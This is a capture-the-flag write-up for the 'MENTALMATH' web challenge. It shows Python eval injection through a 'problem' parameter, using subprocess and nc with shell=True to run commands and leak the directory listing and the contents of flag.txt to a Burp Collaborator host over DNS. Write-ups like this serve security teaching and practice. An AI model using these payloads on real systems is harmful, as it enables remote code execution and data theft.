Tags: python rce
# ▼▼▼MENTALMATH(Web:262pts,132/661=20.0%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
---
## 【Vulnerability identification】
I guessed it was calculated by `eval()`. As a result of trying various things, we succeeded with the following.
↓
problem=`__import__('subprocess').check_output("nc fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓
A DNS request came in!! **Python arbitrary code execution**
---
## 【Get flag】
problem=`__import__('subprocess').check_output("nc $(ls|tr -d '\n')c.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓
The following DNS request comes in:
```
db.sqlite3flag.txtmanage.pymathgamementalmathrequirements.txtc.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net.
```
↓
`flag.txt`
---
problem=`__import__('subprocess').check_output("nc $(cat flag.txt|tr -cd 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')c.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓
```
gigem14mg0od47m4tH3m4aaticsn07s3cUr1tyh3h3h3hec.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net.
```
↓
`gigem{14mg0od47m4tH3m4aaticsn07s3cUr1tyh3h3h3he}`
↓
I can't submit and it looks like something is missing.
---
Try: convert `_` to `L`. That is, `sed -e 's/%5c_/L/g'`
↓
problem=`__import__('subprocess').check_output("nc $(cat flag.txt|sed -e 's/%5c_/L/g'|tr -cd 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')c.fq9t6679b9hepavimvwu6df0nrthh6.burpcollaborator.net 80",shell=True)`&answer=0
↓ Convert `L` to `_`
`gigem{1_4m_g0od_47_m4tH3m4aatics_n07_s3cUr1ty_h3h3h3he}`